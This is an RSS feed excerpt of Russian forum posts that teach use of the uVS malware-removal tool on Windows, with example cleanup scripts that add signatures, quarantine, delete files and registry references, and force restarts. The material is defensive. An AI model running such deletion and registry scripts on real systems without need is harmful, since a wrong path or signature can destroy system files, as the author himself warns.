			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108566/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			При анализе системы ( хорошо вам знакомой системы )<br />Если в списке активных процессоров видим процессы относящиеся к оборудованию, антивирусом, браузерам и т.д. которые вы не устанавливали... а они есть ... <br />
			<i>12.03.2020 15:09:03, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108566/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108566/</guid>
			<pubDate>Thu, 12 Mar 2020 15:09:03 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108565/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Выполнение скрипта с параллельным созданием нового образа автозапуска.<br />*Добавляем команду: crimg<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br /><br />addsgn A7679BF0AA0244834FD4C601898A1261848AFCF689AA7BF1A0C3C5BC5055<WBR/>&shy;9D14704194DE5BBD625CD7E0C09F75C4C32EF4CA383113DA3BE4AC965B2F<WBR/>&shy;C706AB7E 8 &nbsp;Fox .Vir1-2.<br /><br />adddir %SystemRoot%\Zebra.exe<br />chklst<br />delvir<br />deltmp<br />delnfr<br />crimg<br />czoo<br />restart<br /><br />----------------------------------<br />При очистке данных в браузере всегда закрывайте браузеры... &nbsp;Если не закрыть, есть риск, что браузер придётся ремонтировать....<br /><br />----------------------------------<br />uVS поддерживает работу с CMD - с командной строкой.<br /><br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />EXEC cmd /c"netsh winsock reset catalog"<br />restart<br /><br />EXEC cmd &nbsp;- вызов\обращение.<br />netsh winsock reset catalog - сброс настроек и восстановление первоначальной конфигурации LSP Winsock<br /><br />В случае проблем с сетью...<br /><br />-----------------------------------<br />Пример удаления объекта через CMD: &nbsp;( ну а вдруг понадобиться ! )<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv6.1<br /><br />ZOO C:\PROGRAMDATA\Zebra.exe<br />EXEC cmd /c"DEL C:\PROGRAMDATA\Zebra.exe"<br />restart<br /><br />DeL он и в Африке DEL<br /><br />---------------------------------------<br />\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\<br />----------------------------------------<br /><br />* При удалении Активных/Внедряемых &nbsp;.Dll - применяются команды вида: delref + del<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv6.1<br /><br />delref %SystemRoot%\ZUDVA.Dll<br />del %SystemRoot%\ZUDVA.Dll<br />restart <br /><br />Если файл не даёт себя удалить - uVS отложит удаление и удалит при старте PC<br />Не стоит удалять его в лоб командой: delall &nbsp;( но здесь всё индивидуально - раз на раз не приходиться - но не стоит рисковать )<br />--------------------------------------------------<br />или даже так:<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv6.1<br /><br />sreg<br />delref %SystemRoot%\ZUDVA.Dll<br />areg<br /><br />Альтернатива: Удаление в безопасном режиме.<br />---------------------<br />Вторым скриптом - после перегрузки можно добить тушку\файл, что остался &nbsp;на диске. <br />
			<i>12.03.2020 15:01:19, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108565/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108565/</guid>
			<pubDate>Thu, 12 Mar 2020 15:01:19 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108564/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Работа с каталогом.<br /><br />Рассмотрим вариант зачистки каталога с применением сигнатуры.<br />Есть каталог: C:\WINDOWS\Zebra &nbsp;( %SystemRoot%\Zebra )<br />Два файла, этого каталога... по полученным данным прописаны в автозагрузке.<br />Это: Fox 1.exe и &nbsp;Fox 2.exe*<br />*Сигнатуры для файлов Fox 1.exe и &nbsp;Fox 2.exe совпадают.<br />Мы предполагаем, что каталог \ Zebra \ содержит и другие объекты: Fox 3.exe & Fox 4.exe<br />Гипотеза: файлы - Fox 3.exe & Fox 4.exe, имеют схожею сигнатуру с Fox 1.exe и &nbsp;Fox 2.exe.<br />Значит, при применении данной сигнатуры, мы имеем возможность удалить все файлы попавшие под её определение ! &nbsp;<br /><br />а) Добавляем сигнатуру Fox 1.exe & &nbsp;Fox 2.exe &nbsp;( Fox .Vir1-2.)<br />б) Добавляем каталог проверки, &nbsp;это команда: "adddir"*<br />*т.е. Все исполняемые файлы каталога будут добавлены в список проверки.<br />г) chklst & delvir &nbsp;Проверка списка и Удаление файлов попавших под определение сигнатуры.**<br />**Следует учитывать, что проверка/зачистка происходит с применением всех имеющихся в наличие, в файле/баз "sgnz" сигнатур.<br />Сигнатур, полученных и сохранённых, например при выполнении предыдущих скриптов!<br /><br />Последовательность команд:<br />addsgn<br />addsgn - добавление сигнатур\ы<br />adddir<br />adddir - добавление файлов каталога<br /><br />_ НЕДОПУСТИМА ПОДОБНАЯ ЗАЧИСТКА ДЛЯ ОСНОВНЫХ ГРУПП СИСТЕМНЫХ КАТАЛОГОВ ПРИ РАБОТЕ С ОБРАЗОМ_!!!<br />C:\WINDOWS ; <br />C:\WINDOWS\system32<br /> и т.д...<br /><br />Причина: НЕ ПОДКОНТРОЛЬНОЕ ВОЗДЕЙСТВИЕ СИГНАТУРЫ НА ОСНОВНЫЕ СИСТЕМНЫЕ ФАЙЛЫ !!!*<br />*Что, может привести к потере, таких системных файлов, как : TASKMGR.EXE ; USERINIT.EXE и т.п.<br /><br />----------------------------------------------<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br /><br />addsgn A7679BF0AA0244834FD4C601898A1261848AFCF689AA7BF1A0C3C5BC5055<WBR/>&shy;9D14704194DE5BBD625CD7E0C09F75C4C32EF4CA383113DA3BE4AC965B2F<WBR/>&shy;C706AB7E 8 &nbsp;Fox .Vir1-2.<br /><br />adddir %SystemRoot%\Zebra.exe<br />chklst<br />delvir<br />deltmp<br />delnfr<br />czoo<br />restart<br /><br />czoo &nbsp;- команда поместить папку zoo ( со всеми файлами ) в архив.<br />Применяется архиватор на основе 7-zip<br />------------------------------------------------<br /><br />Нам нужно посмотреть каталог которого программа не видит - или внешний диск с информацией ?<br />Можно добавить каталог вручную, а можно написать и выполнить скрипт который это сделает.<br /><br />Добавление файлов каталога с автоматическим созданием образа.<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br /><br />adddir %Sys32%<br />crimg<br /><br />_____________<br /><br />crimg - &nbsp;Команда создает полный образ автозапуска.<br /><br />--------------------------------------------------- <br />
			<i>12.03.2020 14:37:45, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108564/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108564/</guid>
			<pubDate>Thu, 12 Mar 2020 14:37:45 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108563/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			ПРИМЕР: "дубляж"<br />Всё тоже самое - но когда файл не один...<br />_______________________________________________ &nbsp;<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />zoo %SystemRoot%\Fox.SYS<br />zoo %SystemRoot%\Foxx.SYS<br />zoo %SystemRoot%\Foxxx.SYS<br />sreg<br />delref %SystemRoot%\Fox.SYS<br />delref %SystemRoot%\Foxx.SYS<br />delref %SystemRoot%\Foxxx.SYS<br />areg<br /><br />------------------------------------------------------------------<br /><br /><br />Следует учитывать - что сразу после применения команды Актуализации - "areg"<br />Компьютер автоматически выполнит перезагрузку!<br />Что обязательно следует учитывать - при работе с серверными машинами !<br />т.е - Это, сказка о перезагрузке почтового сервера... &nbsp;;)<br />То, что машина серверная - смотрим ЛОГ + &nbsp;установленное спец. Программное обеспечение.<br /><br />** Работа с реестром требует особой осторожности - Отдаётся - только самый минимум из необходимых команд.<br />Отдавать - другие команды в рамках этого скрипта недопустимо ! ( работаем только с реестром )<br />* Недопустимо в том плане, что наука ещё не в курсе дела, к каким последствиям это приведёт для всех участников эксперимента !<br />Когда, есть необходимость в дополнительной очистке - то создаётся новый, дополнительный скрипт лечения !<br /><br />В случае, где нет Явного объекта ( но есть подозрения ) с которым можно работать применяется такой скрипт:<br /><br />_______________________________________________<br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br /><br />sreg<br />areg<br /><br />_______________________________________________<br /><br />Или такой:<br />_______________________________________________<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br /><br />breg<br />sreg<br />areg<br /><br />где команда breg применяется первой ( это команда &nbsp;выполняет бэкап реестра т.е. создаёт\сохраняет его копию ) <br />
			<i>12.03.2020 14:20:59, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108563/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108563/</guid>
			<pubDate>Thu, 12 Mar 2020 14:20:59 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108562/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Выше была упомянута: Виртуализация реестра.<br />Что это и для чего ?<br /><br />Применяется, при наличие устойчивых форм заражения.<br />Этот скрипт, работает с применением функции виртуализации &nbsp;системного реестра.<br />т.е. Происходит его копирование с последующей заменой\подменой и самопроизвольным отсечением скрытых данных/объектов автозапуска.<br />Меню: Реестр &gt; "Безопасная виртуализация SYSTEM & SOFTWARE"*<br />Это команда - "sreg"<br />После, этой команды, мы в качестве дополнительной меры очистки удаляем ссылку на объект из реестра.<br />"delref"<br />delref %Sys32%\Fox.SYS<br />И, в завершении отдаём команду на Актуализацию реестра.<br />Меню: Реестр &gt; "Актуализировать SYSTEM & SOFTWARE" = команда "areg"<br /><br />_______________________________________________<br /><br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br /><br />sreg<br />delref %SystemRoot%\Fox.SYS<br />areg<br /><br />-----------------------------------------------------------------<br /><br />С виртуализацией & Zoo* <br />*Где Zoo это помещение файла в карантин &nbsp;:) & ;)<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br /><br />zoo %SystemRoot%\Fox.SYS<br />sreg<br />delref %SystemRoot%\Fox.SYS<br />areg<br /><br /><br />Нам нужно получить копию вируса ( для отправки в вирусную лабораторию )<br />применяем команду: &nbsp;zoo &nbsp;( скопировать файл в папку zoo - папка создаётся в каталоге программы )<br /><br />Да, кстати - есть такая категория, как &nbsp;без файловые вирусы - они находятся в оперативной памяти и не существуют на диске в виде файла.<br /><br />------------------------------------------------------------------------ <br />
			<i>12.03.2020 14:12:00, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108562/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108562/</guid>
			<pubDate>Thu, 12 Mar 2020 14:12:00 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108558/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			В каких случаях рекомендуется применение сигнатуры ?<br />Применение сигнатуры оправдано тогда, когда тело вируса постоянно меняется и меняется его имя, место положение и контрольная сумма ( SHA1 )<br />Типа: Worm.RussoTuristo и т.д.<br />------------------<br />Если случай заражения более тяжёлый ?<br />например это Руткит: <noindex><a href="https://ru.wikipedia.org/wiki/%D0%A0%D1%83%D1%82%D0%BA%D0%B8%D1%82" target="_blank" rel="nofollow">https://ru.wikipedia.org/wiki/%D0%A0%D1%83%D1%82%D0%BA%D0%B8%D1%82</a></noindex><br /><br />Если, удаляется файл c расширением Sys.<br />например: Fox.sys<br />Смотрим активен этот процесс на данный момент или нет.<br />Если активен - то оптимальный вариант удаления такого объекта - это загрузка Компьютера в безопасном режиме.* ( F8 )<br />*Или зачистка _SyS_ объектов, по методу виртуализации реестра.<br />Необходимо? - предварительное восстановление безопасного режима: SafeBoot ( SafeBoot ) - твик №21.<br />Соответственно, скрипт выполняется в безопасном режиме.<br />Сами же скрипты, пишутся по аналогичной/базовой схеме.<br />**Работа с _SyS_ объектами в безопасном режиме является важным требованием !<br />так, как в обычном режиме вирус\служба активен и работает его самозащита.<br />_____________________________________________<br />Логика процесса лечения такая:<br />Уничтожается вирус &gt; устраняются последствия его деятельности ( применяем твики ) - после чего зачищаем мусор. ( файлы и хвосты в реестре )<br />---------------------------------------------------------------<br />\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\<WBR/>&shy;\\\\<br /><br />Комбинированный скрипт.<br /><br />Представляет собой сочетание 2-х методов.<br />В данном случае речь идёт о применении сигнатур и удаления файла по его ( прямому ) пути.<br />Мы, его решаем удалять по прямому пути: C:\Windows\System32\Fox.EXE<br />в скрипте этот путь будет указан, как - %Sys32% <br />Сфера применения: Борьба с устойчивыми к удалению Объектами - повышение эффективности/результативности скрипта.<br /><br />Логика скрипта: Добавляется сигнатура объекта - после чего происходит удаление по прямому пути - далее отдаются команды на проверку списка и удаления файлов попавших под влияние сигнатуры - затем происходит зачистка от мусора.<br />И, как всегда совершенно неожиданно мы обнаруживаем, что заблокирован редактор реестра и применяем твик №2 <br />"Разблокировать редактор реестра"<br />И - в завершение, чтобы изменения вступили в силу перезагружаем PC.<br />*Команда bl может - как применять так и не применяться.<br />** В данном случае важное значение имеет последовательность отданных команд.<br />Пример такого скрипта:<br />_______________________________________________<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv10.0<br />v400c<br />OFFSGNSAVE<br />addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6<WBR/>&shy;1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F<WBR/>&shy;64CAB633 8 Fox.Vir<br />chklst<br />delvir<br />delall %Sys32%\Fox.EXE<br />deltmp<br />delnfr<br />regt 2<br />restart<br /><br />--------------<br />delall - удалить файл и ссылки на него.<br />Значит, что &nbsp;у нас в карманцах ?<br />Добавили сигнатуру &gt; проверили список &gt; ( скорректировали при необходимости длину сигнатуры ) и\или добавили команду hide &gt; Убили вирус.<br />Дополнительно Удалили файл вируса командой: delall &nbsp;( ну вот захотелось )<br />Очистили временные папки Temp от мусора <br />deltmp - зачистка папок Temp ( и прочее и тому подобное ) ( в них часто пасутся тушки\тела вирусов )<br />delnfr &nbsp;- зачищаем PC от ссылок на отсутствующие &nbsp;объекты.<br />Сейчас команда delnfr выдаётся по каждому файлу отдельно ( чтобы оператор видел - что и как )<br />Пример:<br />delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.35.422\PSMACHINE_64.DLL<br />delref %SystemRoot%\SYSWOW64\COMPPKGSRV.EXE<br />delref F:\AUTORUN.EXE<br />Дополнительно &gt; Очистить корзину удалить временные файлы... ALT+Del<br />В низу будет лог - программа показывает, что именно очищается.<br />Просмотр лога: Alt+L <br />
			<i>12.03.2020 13:40:49, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108558/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108558/</guid>
			<pubDate>Thu, 12 Mar 2020 13:40:49 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108557/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			При работе с сигнатурами ( если невозможно скорректировать\подобрать нужную длину ) применяется команда: &nbsp;hide ( скрыть файл )<br /><br />Пример:<br />hide %SystemRoot%\SYSWOW64\IE4UINIT.EXE<br /><br />-----------------------------------------------------------------<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv10.0<br />v400c<br />OFFSGNSAVE<br />addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6<WBR/>&shy;­1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42<WBR/>&shy;F­64CAB633 8 Fox.Vir.exe<br />hide %SystemRoot%\SYSWOW64\IE4UINIT.EXE<br />chklst<br />delvir<br />regt 1<br />restart<br /><br /><br />Правой лапой мыши по файлу и в меню: Статус &gt; Скрыть файл.<br />Файл скрывается из списка и исключается из всех операций _до выхода_ из uVS<br /><br />Но опять же лень ЭЭЭ !!! т.е. склероз.<br /><br />Поэтому:<br />параметр в Settings.ini<br />раздел: &nbsp;[Settings]  <br />Пишем:<br />; Скрывать проверенные файлы со статусом "ВИРУС" если активен белый список.<br />; (файлы скрываются при запуске функции автоскрипт)<br />ImgAutoHideVerified (по умолчанию 0) ( 0 - не активно\отключено )<br />Чтобы работало прописать:<br />ImgAutoHideVerified = 1 <br />
			<i>12.03.2020 13:18:33, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108557/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108557/</guid>
			<pubDate>Thu, 12 Mar 2020 13:18:33 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108556/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Опасная методика... ( не для малоопытных )<br />У нас, есть Зверь: Fox.EXE<br />Мы, его решаем удалять с применением сигнатуры.<br />Для этого в меню данного файла выбираем:<br />"Добавить сигнатуру в скрипт и вирусную базу"<br />В результате получаем команду:<br /><br />addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6<WBR/>&shy;1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F<WBR/>&shy;64CAB633 8 Fox.Vir *<br /><br />addsgn - команда добавления.<br />Сама сигнатура: 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6<WBR/>&shy;1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F<WBR/>&shy;64CAB633<br /><br />длина &nbsp;8 ( длину можно\нужно корректировать, если есть ложные определения\срабатывания. )<br /><br />имя &nbsp;Fox.Vir &nbsp;- Имя "Fox.Vir" можно задать любое.<br /><br />Сама сигнатура ничего не удаляет она лишь позволяет найти тело вируса и объекты схожие с ним.<br />Поэтому, нужна дополнительная команда на удаление.<br />Проверяем по сигнатуре файлы в списке.<br />Команда: chklst &nbsp;( Команда: Проверить список )<br />Смотрим, какие файлы определены, как вирусы - и нет ли среди них системных файлов или чего другого лишнего !!!<br />Оставляем - то, что следует удалить - <br />( путём корректировки/изменения длинны сигнатуры для тех файлов которые ложно попали под неё )<br /><br />Убедившись, что нет ложных определений - даём команду: delvir &nbsp;( команда: Убить все вирусы )<br /><br />И тут, совершенно неожиданно видим, что заблокирован Диспетчер задач!<br />Ну...<br />Такое безобразие совершенно недопустимо - думаем мы!<br />Совершенно недопустимое безобразие!<br />И, решаем его разблокировать - применив соответствующий твик №1. ( Дополнительно &gt; Твики )<br />Команда: regt 1<br />Вот и скрипт целиком:<br />_____________________________________________<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv10.0<br />v400c<br /><br />addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6<WBR/>&shy;1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F<WBR/>&shy;64CAB633 8 Fox.Vir.exe<br /><br />chklst<br />delvir<br />regt 1<br />restart<br /><br />так, как сигнатуры дело опасное и мы не хотим чтобы uVS сохранила сигнатуру добавляем команду: OFFSGNSAVE ( OFF SGN SAVE )<br />В чём риск\опасность сохранения сигнатур\ы в базе ?<br />Опасность в том, что вы не знаете и не видите, что пользователь добавил в свою базу и насколько это было разумно\корректно сделано, не появились ли за &nbsp;прошедшее время новые программы, или системные файлы ( которые с этими сигнатурами не проверялись )<br /><br /> o Скриптова команда OFFSGNSAVE С момента исполнения запрещает сохранение базы сигнатур до выхода из uVS и дополнительно отключает записи из пользовательской базы сигнатур на время работы скрипта.<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv10.0<br />v400c<br />OFFSGNSAVE<br />addsgn 4933E7C655AD49809D94AE0674D4128E30786AB689D1C58796609F2F10D6<WBR/>&shy;1745D03C0414751D9E8F60C0E296AD7040123DDC375992D968C40461A42F<WBR/>&shy;64CAB633 8 Fox.Vir.exe<br /><br />chklst<br />delvir<br />regt 1<br />restart<br /><br />------------------<br />chklst &nbsp;- проверка списка<br />delvir - удаление вируса.<br /><br />Но нам же лень всякий раз прописывать команду OFFSGNSAVE.... Или можно забыть и не добавить...<br /><br />Есть возможность Автоматически добавлять команду в скрипт.<br /><br />Откройте в тестовом редакторе файл: Settings.ini<br />и в разделе: [Settings] Пропишите:<br /><br />; Флаг управляет автоматическим добавлением скриптовой команды<br />; OFFSGNSAVE<br />bHlpNoSaveSgn=1 (0 по умолчанию) <br />
			<i>12.03.2020 13:07:48, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108556/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108556/</guid>
			<pubDate>Thu, 12 Mar 2020 13:07:48 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108555/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			* При добавление файлов с диска может быть так, что в категории: "Добавлены в ручную " будут отображаться не все фалы - так, как программа может до вас найти некоторые файлы и поместить их в другие категории.<br />Чтобы увидеть все файлы перейдите в категорию: "ВСЕ" &nbsp; можно задать поиск\фильтр по букве диска. <br />
			<i>12.03.2020 12:39:33, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108555/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108555/</guid>
			<pubDate>Thu, 12 Mar 2020 12:39:33 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108554/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Вам прислали образ автозапуска созданный в uVS и вы хотите найти вирус и написать скрипт очистки ?<br /><br />Открываем меню и применяем команды:<br /><br />Запретить запуск файла (по хешу )<br />Удалить все ссылки вместе с файлом<br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv10.0<br />v400c<br />bl 73FB07A3CC81A5CD049CFCAH956AEF09 39604240<br />delall H:\Атомный лес.exe<br />apply<br /><br /><br />bl - Команда запретить запуск.<br />73FB07A3CC81A5CD049CFCAH956AEF09 39604240 &nbsp;( собственно сам SHA1 - идентификатор файла чей запуск запрещаем )<br />delall - Команда удалить все ссылки вместе с файлом<br /><br />apply - принять изменения. ( команда оптимизации\ускоряющая выполнение скрипта когда в скрипте много команд и как подтверждение )<br /><br />---------------------------<br />Если заблокировали не тот файл ?<br />В меню есть команда: Снять блокировку запуска файла ( по хешу )<br />или <br />Или глобально снять ограничение для всех файлов... применив твик №19. ( снять ограничения по запуску... )<br />Дополнительно &gt; Твики &gt; Твик №19.<br /><br />При необходимости в скрипт можно добавить команду<br />restart<br />для перезагрузки PC<br />В каком порядке отдавать команду restart и можно ли её прописать в начале скрипта ?<br />Да можно ( на современных\актуальных версиях - программа сама определит наличие этой команды и выполнит её только в &nbsp;конце. )<br /><br /><br />;uVS v4.1.8 [<noindex><a href="http://dsrt.dyndns.org:8888" target="_blank" rel="nofollow">http://dsrt.dyndns.org:8888</a></noindex>]<br />;Target OS: NTv10.0<br />v400c<br />restart<br />bl 73FB07A3CC81A5CD049CFCAC956AEF09 39604240<br />delall H:\Атомный лес.exe<br />apply<br /><br />Для чего запрещаем запуск по SHA1 &nbsp;?<br />Именно этот вирус не сможет запуститься на PC - если его занесут повторно.<br />* Изменения на запрет\разрешение вступают в силу после перезагрузки PC<br />Если запустился ? Значит это другой вирус или другой вариант этого, или вы что-то намудрили.<br />** Если запретить таким образом запуск для большого числа файлов - это может привести к замедлению в работе PC так, как система будет вынуждена проверять объекты.<br />( сотни или тысячи файлов ) <br />
			<i>11.03.2020 22:56:01, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108554/</link>
			<guid>http://forum.esetnod32.ru/messages/forum8/topic15785/message108554/</guid>
			<pubDate>Wed, 11 Mar 2020 22:56:01 +0300</pubDate>
			<category>Полезные программы</category>
		</item>
		<item>
			<title>uVS как стать опытными пользователем этой программы.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum8/topic15785/message108553/">uVS как стать опытными пользователем этой программы.</a></b> <i>Обучение пользования программой uVS</i> в форуме <a href="http://forum.esetnod32.ru/forum8/">Полезные программы</a>. <br />
			Принесли флэшку и на ней может быть вирус ?<br />Для проверки можно загрузить Систему в безопасном режиме, или использовать Live CD<br />( Вообще лучше заранее подготовиться и отключить автозапуск - Пуск &gt; Панель Управления &gt; Автозапуск )<br /><noindex><a href="https://ru.wikipedia.org/wiki/Autorun.inf" target="_blank" rel="nofollow">https://ru.wikipedia.org/wiki/Autorun.inf</a></noindex><br />Но если вирус проникает посредством эксплуатации уязвимости Системы ?<br />Варианты:<br />1) Выкинуть флэшку.<br />2) Загрузить Систему в безопасном режиме, или использовать Live CD<br />-------------<br />Файл &gt; Добавить в список &gt; Все исполняемые файлы в каталоге ( и указываем диск\букву диска )<br />Получите список _всех _исполняемых файлов на диске. (.exe; dll и т.д )<br />И если на диске не должно быть таких файлов то... ( хлопните правой лапой мыши по записи и откроется меню с командами... )<br />После чего нажмите: Принять изменения ( Клавиша в меню окна )<br />После этого можно нажать: Обновить Список. <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=115989&" width="1085" height="668" /><br /><img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=115990&" width="1031" height="792" /><br /><i>11.03.2020 22:24:40, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum8/topic15785/message108553/</link>
